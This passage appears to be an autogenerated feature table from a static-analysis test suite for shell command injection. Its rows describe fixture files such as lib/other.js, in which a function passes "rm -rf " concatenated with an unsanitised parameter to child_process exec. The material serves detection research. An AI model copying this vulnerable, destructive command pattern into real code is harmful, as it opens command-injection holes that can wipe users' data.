name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:23:545:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:23:545:26 | name | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:23:545:26 | name | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:23:545:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:545:23:545:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:1:1:0 | this | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:1:1:0 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:1:1:1 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:1:1:1 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:1:1:1 | module | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:1:1:1 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:1:1:1 | module | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:1:1:1 | require | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:1:1:1 | require | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:5:1:6 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:5:1:6 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:5:1:33 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:5:1:33 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:5:1:33 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:5:1:33 | cp = re ... ocess") | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:5:1:33 | cp = re ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:5:1:33 | cp = re ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:10:1:16 | require | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:10:1:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:10:1:16 | require | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:10:1:33 | exceptional return of require ... ocess") | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:10:1:33 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:10:1:33 | exceptional return of require ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:10:1:33 | require ... ocess") | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:10:1:33 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:10:1:33 | require ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:18:1:32 | "child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:18:1:32 | "child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:18:1:32 | "child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:18:1:32 | "child_process" | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:18:1:32 | "child_process" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:1:18:1:32 | "child_process" | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:1:3:6 | module | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:1:3:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:1:3:6 | module | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:1:3:14 | module.exports | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:1:3:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:1:3:14 | module.exports | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:1:5:1 | module. ... ule. \\n} | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:1:5:1 | module. ... ule. \\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:1:5:1 | module. ... ule. \\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:8:3:14 | exports | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:8:3:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:8:3:14 | exports | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:3:17 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:3:17 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:3:17 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:3:17 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:3:17 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:3:17 | this | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:3:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:3:17 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:3:17 | this | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:3:17 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | 'arguments' object of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | 'arguments' object of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | exceptional return of anonymous function | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | exceptional return of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | exceptional return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | functio ... ule. \\n} | assignedToPropName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | functio ... ule. \\n} | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | functio ... ule. \\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | functio ... ule. \\n} | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | return of anonymous function | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | return of anonymous function | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:18:5:1 | return of anonymous function | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:28:3:31 | name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:28:3:31 | name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:28:3:31 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:28:3:31 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:28:3:31 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:28:3:31 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:28:3:31 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:28:3:31 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:28:3:31 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:3:28:3:31 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:3 | cp | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:3 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:3 | cp | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:3 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:8 | cp.exec | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:8 | cp.exec | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:8 | cp.exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:26 | cp.exec ... + name) | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:26 | cp.exec ... + name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:26 | cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:2:4:26 | exceptional return of cp.exec ... + name) | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:5:4:8 | exec | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:5:4:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:5:4:8 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:5:4:8 | exec | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:5:4:8 | exec | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:10:4:18 | "rm -rf " | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:10:4:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:10:4:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:10:4:18 | "rm -rf " | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:10:4:18 | "rm -rf " | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:10:4:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:10:4:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:10:4:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:10:4:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:10:4:25 | "rm -rf " + name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:10:4:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:10:4:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:10:4:25 | "rm -rf " + name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:10:4:25 | "rm -rf " + name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:10:4:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:22:4:25 | name | contextFunctionInterfaces | exports(name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:22:4:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:22:4:25 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:22:4:25 | name | enclosingFunctionName | exports | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:22:4:25 | name | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/other.js:4:22:4:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:1:1:0 | this | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:1:1:1 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:1:1:1 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:1:1:1 | require | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:5:1:6 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:5:1:6 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:5:1:6 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:5:1:33 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:5:1:33 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:5:1:33 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:5:1:33 | cp = re ... ocess") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:5:1:33 | cp = re ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:5:1:33 | cp = re ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:10:1:16 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:10:1:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:10:1:16 | require | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:10:1:33 | exceptional return of require ... ocess") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:10:1:33 | exceptional return of require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:10:1:33 | exceptional return of require ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:10:1:33 | require ... ocess") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:10:1:33 | require ... ocess") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:10:1:33 | require ... ocess") | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:18:1:32 | "child_process" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:18:1:32 | "child_process" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:18:1:32 | "child_process" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:18:1:32 | "child_process" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:18:1:32 | "child_process" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:1:18:1:32 | "child_process" | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:3:15 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:3:15 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:3:15 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:3:15 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:3:15 | cp | fileImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/subLib2/compiled-file.ts:3:16:3:15 | this | contextFunctionInterfaces | | +| 